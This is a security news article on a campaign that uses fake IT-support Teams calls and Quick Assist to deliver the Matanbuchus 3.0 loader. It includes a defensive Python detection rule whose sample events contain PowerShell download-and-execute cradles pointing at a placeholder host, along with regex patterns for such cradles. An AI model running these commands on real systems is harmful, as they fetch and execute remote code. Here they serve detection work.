Microsoft Teams Call Weaponized to Deploy & Execute Matanbuchus 3.0 Loader

A cyberattack campaign that came to light in July 2025 weaponizes Microsoft Teams calls to deliver the latest iteration of the Matanbuchus loader, malware that commonly precedes ransomware deployment.

The attack begins with adversaries impersonating IT helpdesk staff on external Teams calls and using social-engineering tactics to convince employees to execute malicious scripts.

During the resulting "support" session, the attackers have the victim launch Quick Assist and then instruct them to run PowerShell commands that ultimately deploy the Matanbuchus 3.0 loader, a significant evolution in the malware's delivery mechanism.
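The chain above leaves a host-side trace that is independent of the Teams call itself: a Quick Assist process starts, and shortly afterwards the same user launches PowerShell with a download cradle or other obfuscation switches. The following correlation rule is an added example, not code from the article or from the researchers who analyzed the sample. It runs over constructed Sysmon-style process-creation events (Event ID 1 exported as JSON); the host names, user names, the Quick Assist package path, the domain example.invalid and the base64 blob are all made up for illustration, and the 30-minute window is an assumed tuning value.

```python
"""Correlate Quick Assist launches with follow-on suspicious PowerShell.

Added example (not from the article or any vendor tooling). Input is a set
of Sysmon Event ID 1 (process creation) records as JSON lines with the
fields ts, host, user, image, parent_image and command_line.
"""
import json
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample telemetry, not real data from the campaign.
SAMPLE_EVENTS = r"""
{"ts": "2025-07-10T09:12:03Z", "host": "WS-0421", "user": "CORP\\jdoe", "image": "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.QuickAssist_2.0.0.0_x64__8wekyb3d8bbwe\\QuickAssist.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "QuickAssist.exe"}
{"ts": "2025-07-10T09:13:00Z", "host": "WS-0777", "user": "CORP\\asmith", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell.exe -nop -c \"iwr http://example.invalid/a.ps1 | iex\""}
{"ts": "2025-07-10T09:15:47Z", "host": "WS-0421", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell.exe -nop -w hidden -ep bypass -c \"iwr https://example.invalid/update.ps1 | iex\""}
{"ts": "2025-07-10T09:40:00Z", "host": "WS-0421", "user": "CORP\\helpdesk", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell.exe -Command Get-Service -Name Spooler"}
{"ts": "2025-07-10T11:30:00Z", "host": "WS-0421", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell.exe -enc SQBFAFgAIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA="}
"""

PS_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line indicators typical of hands-on-keyboard loader delivery.
INDICATORS = {
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
}


def basename(image: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text: str) -> List[Dict]:
    """Parse JSON-lines events and convert the ts field to datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        events.append(ev)
    return events


def powershell_indicators(command_line: str) -> List[str]:
    """Names of every indicator pattern that matches the command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(command_line)]


def correlate(events: List[Dict], window: timedelta = timedelta(minutes=30)) -> List[Dict]:
    """Flag suspicious PowerShell that starts within `window` after a
    Quick Assist launch on the same host.  Returns one alert per match."""
    events = sorted(events, key=lambda e: e["ts"])
    qa_starts = [e for e in events if basename(e["image"]) == "quickassist.exe"]
    alerts = []
    for ev in events:
        if basename(ev["image"]) not in PS_IMAGES:
            continue
        hits = powershell_indicators(ev["command_line"])
        if not hits:
            continue  # benign administration, e.g. Get-Service
        for qa in qa_starts:
            delta = ev["ts"] - qa["ts"]
            if qa["host"] == ev["host"] and timedelta(0) <= delta <= window:
                alerts.append({
                    "host": ev["host"],
                    "user": ev["user"],
                    "quick_assist_ts": qa["ts"].isoformat(),
                    "powershell_ts": ev["ts"].isoformat(),
                    "seconds_after_quick_assist": int(delta.total_seconds()),
                    "command_line": ev["command_line"],
                    "indicators": hits,
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(alert, indent=2))
```

On the sample data only the WS-0421 launch at 09:15:47 is flagged: the Get-Service call inside the window carries no indicators, the iwr cradle on WS-0777 has no preceding Quick Assist session, and the encoded command at 11:30 falls outside the window (an encoded command is worth its own alert regardless; this rule only covers the Quick Assist correlation). The parent process is deliberately not used as the join key, because in a Quick Assist session the victim types the command themselves, so PowerShell is a child of explorer.exe rather than of QuickAssist.exe.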

Matanbuchus, operating as a Malware-as-a-Service (MaaS) platform since 2021, has undergone substantial enhancements in its third iteration.

The malware is a loader primarily designed to download and execute secondary payloads on compromised Windows systems, serving as the initial foothold for intrusions that frequently culminate in ransomware deployment.

The latest version introduces improved command-and-control communication protocols, enhanced obfuscation, and more thorough system reconnaissance that lets operators tailor follow-on payloads to the security products present on the victim's machine.

The malware is currently being offered at $10,000 for the HTTP variant and $15,000 for the DNS variant, indicating the operators’ confidence in its effectiveness and the substantial resources invested in its development.

The researchers who analyzed the sample noted that the interception occurred before the malware's public release, suggesting that the adversaries were distributing the HTTP loader within trusted circles or using it in their own operations.

The attack methodology represents a concerning shift toward leveraging legitimate business communication platforms for malicious purposes.

In this attack, victims receive seemingly authentic IT support calls through Microsoft Teams, creating a sense of trust that makes them more likely to follow malicious instructions.

The attackers' use of Quick Assist, a legitimate Microsoft remote-assistance tool, lends further credibility to their presence on victim systems while giving them the access they need to deploy their payloads.

This campaign illustrates the evolution of ransomware delivery mechanisms, in which traditional email phishing is supplemented by direct voice contact through trusted collaboration platforms.

The combination of Teams-based social engineering with the technical sophistication of Matanbuchus 3.0 creates a formidable threat, one that can slip past security awareness training built around email phishing as well as conventional technical controls.

(Sources: Cybersecuritynews.com)
